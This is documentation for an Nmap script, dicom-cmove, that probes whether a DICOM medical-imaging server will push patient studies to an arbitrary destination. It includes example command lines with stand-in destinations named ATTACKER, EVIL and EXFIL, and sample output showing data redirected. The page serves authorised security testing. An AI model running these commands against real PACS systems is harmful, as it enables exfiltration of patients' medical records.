Script dicom-cmove

Script types: portrule
Categories: discovery, intrusive
Download: https://svn.nmap.org/nmap/scripts/dicom-cmove.nse

Script Summary

DICOM C-MOVE redirection probe and data exfiltration proof-of-concept.

Tests whether a DICOM PACS/server will honour C-MOVE requests that redirect patient data to an arbitrary destination AE Title. C-MOVE is an SSRF-like primitive: the attacker tells the SCP to push images to a third-party host (or back to the attacker) without needing the target to be in the modality worklist. This is the most dangerous Q/R primitive because:

1. The attacker never receives data on the same association (unlike C-GET); instead, the SCP opens a NEW association to the destination and sends C-STORE sub-operations. 2. If the destination AE is configured in the PACS, the move succeeds silently - the attacker can exfiltrate data to any registered node. 3. Even if the destination is unknown, the SCP may still attempt a TCP connection to resolve it (observable as an outbound connection attempt).

The workflow: 1. (Optional) C-FIND at STUDY level to discover studies 2. C-MOVE-RQ with a configurable MoveDestination AE Title 3. Monitor C-MOVE-RSP status (PENDING progress, SUCCESS, or FAILURE) 4. Report whether the PACS accepted the move, how many sub-operations completed/failed/warned, and any error status codes

This script does NOT set up a listener to receive the redirected images. Use dicom-get.nse if you want to actually download data. This script's purpose is to prove that arbitrary-destination C-MOVE is accepted.

WARNING: This is an intrusive script. A successful C-MOVE causes the target PACS to attempt to push patient data to the specified destination. Only use against systems for which you have explicit written authorisation.

Requires the dicom.lua library (place in nselib/ or same directory).

Script Arguments

dicom-cmove.level

Move level: "STUDY", "SERIES", "IMAGE" (default: "STUDY")

dicom-cmove.info_model

Q/R information model: "study" or "patient" (default: "study")

dicom-cmove.max_studies

Max studies to attempt C-MOVE on (default: 1)

dicom-cmove.patient_name

Patient name filter for C-FIND discovery (default: "*")

dicom-cmove.study_uid

Specific StudyInstanceUID to move (default: discover via C-FIND)

dicom-cmove.max_pdu

Max PDU Length (default: 16384)

dicom-cmove.series_uid

Specific SeriesInstanceUID to move (requires study_uid)

dicom-cmove.dest_ae

MoveDestination AE Title - where to redirect data (default: "YOURPACS")

dicom-cmove.timeout

DIMSE timeout in seconds (default: 15)

dicom-cmove.modality

Modality filter for C-FIND discovery (default: "")

dicom-cmove.patient_id

Patient ID filter for C-FIND discovery (default: "")

dicom-cmove.calling_ae

Our AE Title (default: "NMAP-MOVE")

dicom-cmove.called_ae

Target AE Title (default: "ANY-SCP")

dicom.called_aet, dicom.calling_aet

See the documentation for the dicom library.

Example Usage

  • nmap -p 4242 --script dicom-cmove \
      --script-args 'dicom-cmove.called_ae=ORTHANC,dicom-cmove.dest_ae=ATTACKER' <target>
    
  • # Move a specific study to a destination AE
    nmap -p 4242 --script dicom-cmove \
      --script-args 'dicom-cmove.called_ae=ORTHANC,dicom-cmove.study_uid=1.2.3.4.5,dicom-cmove.dest_ae=EVIL' <target>
    
  • # Probe with patient root model and custom timeout
    nmap -p 4242 --script dicom-cmove \
      --script-args 'dicom-cmove.called_ae=ORTHANC,dicom-cmove.dest_ae=EXFIL,dicom-cmove.info_model=patient,dicom-cmove.timeout=15' <target>
    

Script Output

PORT     STATE SERVICE
4242/tcp open  dicom
| dicom-cmove:
|   Target AE: ORTHANC  Calling AE: NMAP-MOVE
|   MoveDestination: ATTACKER
|   Studies discovered: 2 (via C-FIND)
|   C-MOVE Results:
|     Study 1.2.826...514 - Doe^John (PT_001)
|       Status: REFUSED (0xA801) - Move destination unknown
|       Completed: 0  Failed: 0  Warning: 0
|     Study 1.2.826...515 - Smith^Jane (PT_002)
|       Status: SUCCESS (0x0000)
|       Completed: 45  Failed: 0  Warning: 0
|       WARNING: PACS pushed 45 instances to 'ATTACKER'
|   Summary: 1/2 studies accepted C-MOVE redirection
|   VULNERABILITY: Server redirects patient data to arbitrary AE titles
|_

Requires


Author:

  • Paulino Calderon <paulino@calderonpale.com>

License: Same as Nmap -- See https://nmap.org/book/man-legal.html

action

action (host, port)

MAIN ACTION

Parameters

host
 
port